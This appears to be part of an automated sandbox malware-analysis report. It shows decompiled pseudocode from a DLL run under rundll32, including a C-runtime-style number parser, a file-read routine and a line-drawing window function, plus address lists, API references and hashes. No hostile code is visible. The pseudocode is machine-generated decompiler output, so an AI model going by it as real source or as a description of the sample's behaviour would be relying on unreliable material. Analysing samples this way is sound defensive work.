																				L152:
																				_t235 = _t194;
																				goto L155;
																			}
																			_t235 = _t235 | 0xffffffff;
																			_t208 = _t208 | 0xffffffff;
																			goto L155;
																		}
																		_a8 = _v172;
																		_t194 = 0;
																		_t208 = 0;
																		goto L152;
																	}
																	__eflags = _t239 - _a16;
																	if(_t239 >= _a16) {
																		goto L144;
																	}
																	_t196 = _v20;
																	_t232 = _v8 | 0x00000008;
																	__eflags = _t196 - _t211;
																	_v8 = _t232;
																	_t212 = _v12;
																	if(__eflags < 0) {
																		L141:
																		__eflags = 0;
																		L142:
																		_t214 = E1003F850(_v164, _v160, _t212, _t196) + _t239;
																		__eflags = _t214;
																		_v12 = _t214;
																		asm("adc eax, esi");
																		_v20 = _t232;
																		L143:
																		_t240 = _a8;
																		_t224 = _v168;
																		_t211 = _v16;
																		_t245 =  *_t240 & 0x0000ffff;
																		_a8 =  &(_t240[1]);
																		_t237 = 0x30;
																		continue;
																	}
																	if(__eflags > 0) {
																		L135:
																		__eflags = _t212 - _t224;
																		if(_t212 != _t224) {
																			L140:
																			_v8 = _t232 | 0x00000004;
																			goto L143;
																		}
																		__eflags = _t196 - _v16;
																		if(_t196 != _v16) {
																			goto L140;
																		}
																		__eflags = 0 - _v152;
																		if(__eflags < 0) {
																			goto L142;
																		}
																		if(__eflags > 0) {
																			goto L140;
																		}
																		__eflags = _t239 - _v156;
																		if(_t239 <= _v156) {
																			goto L142;
																		}
																		goto L140;
																	}
																	__eflags = _t212 - _t224;
																	if(_t212 < _t224) {
																		goto L141;
																	}
																	goto L135;
																}
																goto L122;
															}
															_t239 = _t237 | 0xffffffff;
															__eflags = _t239;
															goto L121;
														}
														_t200 = 0x660;
														__eflags = _t245 - 0x660;
														if(_t245 < 0x660) {
															goto L122;
														}
														__eflags = _t245 - _v148;
														if(_t245 >= _v148) {
															_t200 = _v24;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v28;
															if(_t245 < _v28) {
																goto L87;
															}
															_t200 = _v32;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v36;
															if(_t245 < _v36) {
																goto L87;
															}
															_t200 = _v40;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v44;
															if(_t245 < _v44) {
																goto L87;
															}
															_t200 = _v48;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v52;
															if(_t245 < _v52) {
																goto L87;
															}
															_t200 = _v56;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v60;
															if(_t245 < _v60) {
																goto L87;
															}
															_t200 = _v64;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v68;
															if(_t245 < _v68) {
																goto L87;
															}
															_t200 = _v72;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v76;
															if(_t245 < _v76) {
																goto L87;
															}
															_t200 = _v80;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v84;
															if(_t245 < _v84) {
																goto L87;
															}
															_t200 = _v88;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v92;
															if(_t245 < _v92) {
																goto L87;
															}
															_t200 = _v96;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v100;
															if(_t245 < _v100) {
																goto L87;
															}
															_t200 = _v104;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v108;
															if(_t245 < _v108) {
																goto L87;
															}
															_t200 = _v112;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v116;
															if(_t245 < _v116) {
																goto L87;
															}
															_t200 = _v120;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v124;
															if(_t245 < _v124) {
																goto L87;
															}
															_t200 = _v128;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v132;
															if(_t245 < _v132) {
																goto L87;
															}
															_t200 = _v136;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v140;
															if(_t245 >= _v140) {
																goto L122;
															}
														}
														goto L87;
													}
													_t239 = (_t245 & 0x0000ffff) - 0x30;
													goto L121;
													L122:
													_t238 = _t245 & 0x0000ffff;
													__eflags = _t238 - 0x41;
													if(_t238 < 0x41) {
														L125:
														_t133 = _t238 - 0x61; // -49
														_t187 = _t133;
														__eflags = _t187 - 0x19;
														if(_t187 > 0x19) {
															_t239 = _t238 | 0xffffffff;
															__eflags = _t239;
															goto L130;
														}
														L126:
														__eflags = _t187 - 0x19;
														if(_t187 <= 0x19) {
															_t238 = _t238 + 0xffffffe0;
															__eflags = _t238;
														}
														_t239 = _t238 + 0xffffffc9;
														goto L130;
													}
													__eflags = _t238 - 0x5a;
													if(_t238 > 0x5a) {
														goto L125;
													}
													_t132 = _t238 - 0x61; // -49
													_t187 = _t132;
													goto L126;
												}
											}
											__eflags = _t184 - 0x58;
											if(_t184 == 0x58) {
												goto L77;
											}
											__eflags = _t209;
											if(_t209 == 0) {
												_t209 = 8;
												_a16 = _t209;
											}
											E1000FB11( &_a8, _t184);
											goto L80;
										}
										__eflags = _t209;
										if(_t209 == 0) {
											_t209 = 0xa;
											_a16 = _t209;
										}
										goto L80;
									}
									L65:
									__eflags = _t220 - 0x19;
									if(_t220 <= 0x19) {
										_t182 = _t182 + 0xffffffe0;
										__eflags = _t182;
									}
									_t183 = _t182 + 0xffffffc9;
									goto L69;
								}
								__eflags = _t182 - 0x5a;
								if(_t182 > 0x5a) {
									goto L64;
								}
								_t85 = _t182 - 0x61; // 0x5ff
								_t220 = _t85;
								goto L65;
							}
							__eflags = _t245 - _v16;
							if(_t245 >= _v16) {
								__eflags = _t245 - _t219;
								if(_t245 >= _t219) {
									__eflags = _t245 - _v144;
									if(_t245 < _v144) {
										L28:
										_t183 = (_t245 & 0x0000ffff) - _t219;
										L60:
										__eflags = _t183 - 0xffffffff;
										if(_t183 != 0xffffffff) {
											goto L69;
										}
										goto L61;
									}
									_t183 = 0xffffffffffffffff;
									__eflags = 0xffffffffffffffff;
									goto L60;
								}
								__eflags = _t245 - 0x660;
								if(_t245 < 0x660) {
									goto L61;
								}
								__eflags = _t245 - _v148;
								if(_t245 >= _v148) {
									_t219 = _v24;
									__eflags = _t245 - _t219;
									if(_t245 < _t219) {
										goto L61;
									}
									__eflags = _t245 - _v28;
									if(_t245 >= _v28) {
										_t219 = _v32;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v36;
										if(_t245 < _v36) {
											goto L28;
										}
										_t219 = _v40;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v44;
										if(_t245 < _v44) {
											goto L28;
										}
										_t219 = _v48;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v52;
										if(_t245 < _v52) {
											goto L28;
										}
										_t219 = _v56;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v60;
										if(_t245 < _v60) {
											goto L28;
										}
										_t219 = _v64;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v68;
										if(_t245 < _v68) {
											goto L28;
										}
										_t219 = _v72;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v76;
										if(_t245 < _v76) {
											goto L28;
										}
										_t219 = _v80;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v84;
										if(_t245 < _v84) {
											goto L28;
										}
										_t219 = _v88;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v92;
										if(_t245 < _v92) {
											goto L28;
										}
										_t219 = _v96;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v100;
										if(_t245 < _v100) {
											goto L28;
										}
										_t219 = _v104;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v108;
										if(_t245 < _v108) {
											goto L28;
										}
										_t219 = _v112;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v116;
										if(_t245 < _v116) {
											goto L28;
										}
										_t219 = _v120;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v124;
										if(_t245 < _v124) {
											goto L28;
										}
										_t219 = _v128;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v132;
										if(_t245 < _v132) {
											goto L28;
										}
										_t219 = _v136;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v140;
										if(_t245 >= _v140) {
											goto L61;
										}
									}
									goto L28;
								}
								_t183 = (_t245 & 0x0000ffff) - 0x660;
								goto L60;
							}
							_t183 = (_t245 & 0x0000ffff) - _t237;
							goto L60;
						}
						__eflags = _t209 - 0x10;
						if(_t209 != 0x10) {
							goto L80;
						}
						goto L19;
					}
				}
				if(_t209 < _t236) {
					L4:
					 *((intOrPtr*)(E1002449E(_t253))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t253 = _t209 - 0x24;
				if(_t209 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x1000eff7
0x1000f01c
0x1000f01e
0x1000f020
0x1000f022
0x1000f022
0x1000f027
0x1000f02c
0x1000f02c
0x1000f036
0x1000f036
0x1000eff9
0x1000effe
0x1000f001
0x1000f037
0x1000f03a
0x1000f040
0x1000f047
0x1000f04a
0x1000f04d
0x1000f050
0x1000f056
0x1000f059
0x1000f066
0x1000f069
0x1000f06c
0x1000f072
0x1000f073
0x1000f075
0x1000f05e
0x1000f061
0x1000f064
0x1000f064
0x00000000
0x1000f064
0x1000f077
0x1000f07b
0x1000f07e
0x1000f082
0x1000f08b
0x1000f08f
0x1000f09e
0x00000000
0x1000f09e
0x00000000
0x1000f084
0x1000f086
0x1000f091
0x1000f091
0x1000f094
0x1000f097
0x1000f099
0x1000f0a1
0x1000f0a1
0x1000f0a8
0x1000f0ad
0x1000f0bc
0x1000f0c3
0x1000f0ca
0x1000f0d1
0x1000f0d8
0x1000f0df
0x1000f0e6
0x1000f0ed
0x1000f0f4
0x1000f0fb
0x1000f102
0x1000f109
0x1000f110
0x1000f117
0x1000f11e
0x1000f125
0x1000f12c
0x1000f133
0x1000f13a
0x1000f141
0x1000f148
0x1000f14f
0x1000f156
0x1000f15d
0x1000f164
0x1000f16b
0x1000f172
0x1000f179
0x1000f180
0x1000f18a
0x1000f194
0x1000f1a0
0x1000f1a1
0x1000f1a3
0x1000f1ae
0x1000f1ae
0x1000f1b1
0x1000f32f
0x1000f32f
0x1000f332
0x1000f335
0x1000f341
0x1000f341
0x1000f341
0x1000f344
0x1000f347
0x1000f356
0x1000f356
0x1000f359
0x1000f359
0x1000f35b
0x1000f369
0x1000f36c
0x1000f36f
0x1000f372
0x1000f375
0x1000f391
0x1000f391
0x1000f393
0x1000f397
0x1000f398
0x1000f398
0x1000f39b
0x1000f39e
0x1000f39e
0x1000f3a1
0x1000f3a4
0x1000f3a4
0x1000f3a6
0x1000f3a7
0x1000f3a8
0x1000f3aa
0x1000f3b6
0x1000f3bc
0x1000f3c1
0x1000f3c9
0x1000f3cf
0x1000f3d1
0x1000f3d3
0x1000f3d6
0x1000f3dc
0x1000f3dc
0x1000f3df
0x00000000
0x00000000
0x1000f3e7
0x1000f3e8
0x1000f3eb
0x1000f3f8
0x1000f3fd
0x1000f400
0x1000f54c
0x1000f553
0x1000f41d
0x1000f420
0x1000f55c
0x1000f55c
0x1000f55f
0x1000f58b
0x1000f58b
0x1000f58e
0x1000f61d
0x1000f621
0x1000f626
0x1000f629
0x1000f62b
0x1000f63c
0x1000f63f
0x1000f64d
0x1000f64f
0x1000f684
0x1000f688
0x1000f68a
0x1000f68c
0x1000f68f
0x1000f68f
0x1000f691
0x1000f691
0x1000f698
0x1000f6a4
0x1000f6a4
0x00000000
0x1000f698
0x1000f656
0x1000f65c
0x1000f65f
0x1000f661
0x1000f66b
0x1000f66d
0x1000f678
0x1000f678
0x1000f67b
0x1000f66f
0x1000f66f
0x1000f671
0x1000f671
0x1000f680
0x1000f680
0x00000000
0x1000f680
0x1000f663
0x1000f666
0x00000000
0x1000f666
0x1000f633
0x1000f636
0x1000f638
0x00000000
0x1000f638
0x1000f594
0x1000f597
0x00000000
0x00000000
0x1000f5a0
0x1000f5a3
0x1000f5a6
0x1000f5a8
0x1000f5ab
0x1000f5ae
0x1000f5dd
0x1000f5dd
0x1000f5df
0x1000f5f6
0x1000f5f6
0x1000f5f8
0x1000f5fb
0x1000f5fd
0x1000f600
0x1000f600
0x1000f603
0x1000f609
0x1000f60e
0x1000f614
0x1000f617
0x00000000
0x1000f617
0x1000f5b0
0x1000f5b6
0x1000f5b6
0x1000f5b8
0x1000f5d5
0x1000f5d8
0x00000000
0x1000f5d8
0x1000f5ba
0x1000f5bd
0x00000000
0x00000000
0x1000f5c3
0x1000f5c9
0x00000000
0x00000000
0x1000f5cb
0x00000000
0x00000000
0x1000f5cd
0x1000f5d3
0x00000000
0x00000000
0x00000000
0x1000f5d3
0x1000f5b2
0x1000f5b4
0x00000000
0x00000000
0x00000000
0x1000f5b4
0x00000000
0x1000f55f
0x1000f559
0x1000f559
0x00000000
0x1000f559
0x1000f406
0x1000f40b
0x1000f40e
0x00000000
0x00000000
0x1000f414
0x1000f41b
0x1000f427
0x1000f42a
0x1000f42d
0x00000000
0x00000000
0x1000f433
0x1000f437
0x00000000
0x00000000
0x1000f439
0x1000f43c
0x1000f43f
0x00000000
0x00000000
0x1000f445
0x1000f449
0x00000000
0x00000000
0x1000f44b
0x1000f44e
0x1000f451
0x00000000
0x00000000
0x1000f457
0x1000f45b
0x00000000
0x00000000
0x1000f45d
0x1000f460
0x1000f463
0x00000000
0x00000000
0x1000f469
0x1000f46d
0x00000000
0x00000000
0x1000f46f
0x1000f472
0x1000f475
0x00000000
0x00000000
0x1000f47b
0x1000f47f
0x00000000
0x00000000
0x1000f481
0x1000f484
0x1000f487
0x00000000
0x00000000
0x1000f48d
0x1000f491
0x00000000
0x00000000
0x1000f493
0x1000f496
0x1000f499
0x00000000
0x00000000
0x1000f49f
0x1000f4a3
0x00000000
0x00000000
0x1000f4a9
0x1000f4ac
0x1000f4af
0x00000000
0x00000000
0x1000f4b5
0x1000f4b9
0x00000000
0x00000000
0x1000f4bf
0x1000f4c2
0x1000f4c5
0x00000000
0x00000000
0x1000f4cb
0x1000f4cf
0x00000000
0x00000000
0x1000f4d5
0x1000f4d8
0x1000f4db
0x00000000
0x00000000
0x1000f4e1
0x1000f4e5
0x00000000
0x00000000
0x1000f4eb
0x1000f4ee
0x1000f4f1
0x00000000
0x00000000
0x1000f4f3
0x1000f4f7
0x00000000
0x00000000
0x1000f4fd
0x1000f500
0x1000f503
0x00000000
0x00000000
0x1000f505
0x1000f509
0x00000000
0x00000000
0x1000f50f
0x1000f512
0x1000f515
0x00000000
0x00000000
0x1000f517
0x1000f51b
0x00000000
0x00000000
0x1000f521
0x1000f524
0x1000f527
0x00000000
0x00000000
0x1000f529
0x1000f52d
0x00000000
0x00000000
0x1000f533
0x1000f539
0x1000f53c
0x00000000
0x00000000
0x1000f53e
0x1000f545
0x00000000
0x00000000
0x1000f547
0x00000000
0x1000f41b
0x1000f3f0
0x00000000
0x1000f561
0x1000f561
0x1000f564
0x1000f567
0x1000f573
0x1000f573
0x1000f573
0x1000f576
0x1000f579
0x1000f588
0x1000f588
0x00000000
0x1000f588
0x1000f57b
0x1000f57b
0x1000f57e
0x1000f580
0x1000f580
0x1000f580
0x1000f583
0x00000000
0x1000f583
0x1000f569
0x1000f56c
0x00000000
0x00000000
0x1000f56e
0x1000f56e
0x00000000
0x1000f56e
0x1000f3dc
0x1000f377
0x1000f37a
0x00000000
0x00000000
0x1000f37c
0x1000f37e
0x1000f382
0x1000f383
0x1000f383
0x1000f38a
0x00000000
0x1000f38a
0x1000f35d
0x1000f35f
0x1000f363
0x1000f364
0x1000f364
0x00000000
0x1000f35f
0x1000f349
0x1000f349
0x1000f34c
0x1000f34e
0x1000f34e
0x1000f34e
0x1000f351
0x00000000
0x1000f351
0x1000f337
0x1000f33a
0x00000000
0x00000000
0x1000f33c
0x1000f33c
0x00000000
0x1000f33c
0x1000f1b7
0x1000f1bb
0x1000f1c7
0x1000f1ca
0x1000f31a
0x1000f321
0x1000f201
0x1000f204
0x1000f32a
0x1000f32a
0x1000f32d
0x00000000
0x00000000
0x00000000
0x1000f32d
0x1000f327
0x1000f327
0x00000000
0x1000f327
0x1000f1d0
0x1000f1d3
0x00000000
0x00000000
0x1000f1d9
0x1000f1e0
0x1000f1ef
0x1000f1f2
0x1000f1f5
0x00000000
0x00000000
0x1000f1fb
0x1000f1ff
0x1000f20b
0x1000f20e
0x1000f211
0x00000000
0x00000000
0x1000f217
0x1000f21b
0x00000000
0x00000000
0x1000f21d
0x1000f220
0x1000f223
0x00000000
0x00000000
0x1000f229
0x1000f22d
0x00000000
0x00000000
0x1000f22f
0x1000f232
0x1000f235
0x00000000
0x00000000
0x1000f23b
0x1000f23f
0x00000000
0x00000000
0x1000f241
0x1000f244
0x1000f247
0x00000000
0x00000000
0x1000f24d
0x1000f251
0x00000000
0x00000000
0x1000f253
0x1000f256
0x1000f259
0x00000000
0x00000000
0x1000f25f
0x1000f263
0x00000000
0x00000000
0x1000f265
0x1000f268
0x1000f26b
0x00000000
0x00000000
0x1000f271
0x1000f275
0x00000000
0x00000000
0x1000f277
0x1000f27a
0x1000f27d
0x00000000
0x00000000
0x1000f283
0x1000f287
0x00000000
0x00000000
0x1000f28d
0x1000f290
0x1000f293
0x00000000
0x00000000
0x1000f299
0x1000f29d
0x00000000
0x00000000
0x1000f2a3
0x1000f2a6
0x1000f2a9
0x00000000
0x00000000
0x1000f2af
0x1000f2b3
0x00000000
0x00000000
0x1000f2b9
0x1000f2bc
0x1000f2bf
0x00000000
0x00000000
0x1000f2c1
0x1000f2c5
0x00000000
0x00000000
0x1000f2cb
0x1000f2ce
0x1000f2d1
0x00000000
0x00000000
0x1000f2d3
0x1000f2d7
0x00000000
0x00000000
0x1000f2dd
0x1000f2e0
0x1000f2e3
0x00000000
0x00000000
0x1000f2e5
0x1000f2e9
0x00000000
0x00000000
0x1000f2ef
0x1000f2f2
0x1000f2f5
0x00000000
0x00000000
0x1000f2f7
0x1000f2fb
0x00000000
0x00000000
0x1000f301
0x1000f307
0x1000f30a
0x00000000
0x00000000
0x1000f30c
0x1000f313
0x00000000
0x00000000
0x1000f315
0x00000000
0x1000f1ff
0x1000f1e5
0x00000000
0x1000f1e5
0x1000f1c0
0x00000000
0x1000f1c0
0x1000f1a5
0x1000f1a8
0x00000000
0x00000000
0x00000000
0x1000f1a8
0x1000f082
0x1000f005
0x1000f00c
0x1000f011
0x1000f017
0x00000000
0x1000f017
0x1000f007
0x1000f00a
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 1000F3BC

Strings

p, xrefs: 1000F0ED
f, xrefs: 1000F0CA
p, xrefs: 1000F133
f, xrefs: 1000F12C
p, xrefs: 1000F0D1
f, xrefs: 1000F0E6
:, xrefs: 1000F0A1

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction ID: e40459f71609af27f955baf17b6dca83de0bb25eb23cd22cff97dc1eb6c4fdf7
Opcode Fuzzy Hash: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction Fuzzy Hash: EF028475E00259CAFF60CFA4D8486FDB7B2FB40B94FA1811DD424BB689D7705E84AB11

Uniqueness

Uniqueness Score: -1.00%

Function 100015F8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100015F8(void* __ecx, struct HWND__* _a4, int _a12, int _a16) {
				int _v8;
				int _v12;
				intOrPtr _t20;
				intOrPtr _t33;
				void* _t35;
				struct HDC__* _t40;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t33 =  *0x1004dc38; // 0x4f3c70
					_t4 = _t33 + 4; // 0x4f3c70
					_t20 =  *_t4;
					_t5 = _t20 + 8; // 0x0
					_t6 = _t20 + 0xc; // 0x0
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t35, _t33);
					_t40 = GetDC(_a4);
					MoveToEx(_t40,  *_t5,  *_t6, 0);
					LineTo(_t40, _v12, _v8);
					ReleaseDC(_a4, _t40);
				}
				return 0;
			}

0x1000161f
0x1000162a
0x10001633
0x10001633
0x10001636
0x10001639
0x1000163f
0x10001645
0x1000164b
0x10001652
0x10001663
0x10001667
0x10001674
0x1000167e
0x10001686
0x1000168a

APIs

GetMenu.USER32 ref: 10001600
GetSubMenu.USER32 ref: 10001609
GetMenuState.USER32(00000000,000000CB,00000000), ref: 10001617

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 1000165A
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001667
LineTo.GDI32(00000000,?,?), ref: 10001674
ReleaseDC.USER32(?,00000000), ref: 1000167E

Strings

p<O, xrefs: 1000162A, 1000164D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateLineMoveReleaseState
String ID: p<O
API String ID: 2409786466-1042322620
Opcode ID: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction ID: b7c906b1751459d05ed15d7226b6fca836a6211401a0122071cd1be87b3306df
Opcode Fuzzy Hash: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction Fuzzy Hash: 86115E75600118BFEB019FA4CE89FDA7FB9EF0A395F158055FA01D6160C7B19D40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10039C35, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10039C35(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E1002448B(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E1002449E( *_t137))) = 9;
						L60:
						_t139 = E1000E314();
						goto L61;
					}
					__eflags = _t198 -  *0x1004e828; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x1004e628 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E1002448B(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
								E1000E314();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E10024214(_t154);
								E100268B3(0);
								E100268B3(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E1003948F(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E100331B8(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E10024468(_t164);
													goto L39;
												}
												_t236 = 0;
